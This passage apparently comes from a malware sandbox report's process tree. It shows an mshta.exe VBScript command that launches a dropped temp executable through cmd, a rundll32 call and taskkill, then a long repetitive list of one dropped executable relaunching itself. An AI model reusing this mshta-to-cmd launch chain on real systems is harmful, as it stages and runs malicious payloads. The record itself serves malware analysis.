        "C:\Windows\System32\mshta.exe" VBSCripT: CloSe ( CReateOBjecT ("wSCRipT.sheLl"). RUN ( "cmD /q /C TYPe ""C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE"" > Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF ""-PyTJSIPDC12bsxp0f1 "" == """" for %Q in ( ""C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE"" ) do taskkill -F -im ""%~NxQ"" ", 0, truE) )
        6⤵
        
        PID:9668
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q /C TYPe "C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE" >Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF "-PyTJSIPDC12bsxp0f1 " == "" for %Q in ("C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE" ) do taskkill -F -im "%~NxQ"
        7⤵
        
        PID:16968
      - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" .\BPJm7xC.Iwa,Rgac
        6⤵
        
        PID:17524
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -F -im "8oZeWKkA0nHwtXnLVgRQz3Ww.exe"
        5⤵
        Kills process with taskkill
        
        PID:7060
- C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
  "C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:840
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    - Executes dropped EXE
    PID:4584
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    - Executes dropped EXE
    PID:5096
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    - Executes dropped EXE
    PID:4780
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    - Executes dropped EXE
    PID:2856
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    - Executes dropped EXE
    PID:3468
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    - Executes dropped EXE
    PID:1752
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    - Executes dropped EXE
    PID:5544
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    - Executes dropped EXE
    PID:5176
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    - Executes dropped EXE
    PID:5940
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    - Executes dropped EXE
    PID:5220
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 24
      4⤵
      Program crash
      PID:2164
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:4028
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:5384
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:5932
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:5144
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:5032
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:6344
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:6776
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:6244
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:6868
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:2256
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:6992
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:7076
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:7432
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:7788
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:7292
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:7868
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:7340
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:6088
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:8612
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:8936
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:1660
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:8708
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:4260
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:9256
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:9792
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:9140
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:6340
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:6212
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:5388
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:8996
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:4468
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:10292
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:10676
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:10968
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:11260
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:10520
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:11252
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:7508
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:10544
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:9356
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:3656
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:10068
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:7172
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:11500
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:11968
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:11340
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:11912
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:8176
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:9104
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:11680
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:9080
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:9044
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:6968
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:12568
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:12948
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:12320
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:12076
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:11512
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:13284
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:12696
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:12792
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:12416
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:13556
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:13916
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:14168
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:12248
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:13704
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:8016
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:14280
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:11784
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:2340
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:10612
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:13016
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:14592
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:14984
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:14404
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:14968
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:14792
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:15336
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:13080
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:4400
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:7520
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:15732
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:16160
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:13408
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:16228
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:15424
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:14884
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:11208
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:11904
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:13508
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:11580
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:8032
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:8288
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:15508
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:16788
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:17176
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:16552
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:16932
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:13208
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:15684
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:5116
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:17456
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:17840
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:18224
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:16160
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:18280
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:4964
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:17944
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:6544
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:9672
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:18500
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:18904
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:19272
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:18760
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:16488
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:17012
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:18816
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:17028
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:18156
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:19772
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:20180
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:16944
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:20116
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:6392
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:20252
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:11888
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:15848
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:19172
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:20592
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:21028
- - C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    C:\Users\Admin\Documents\jHeKxe0iI2r3sbhVL6AzhET0.exe
    3⤵
    PID:21412
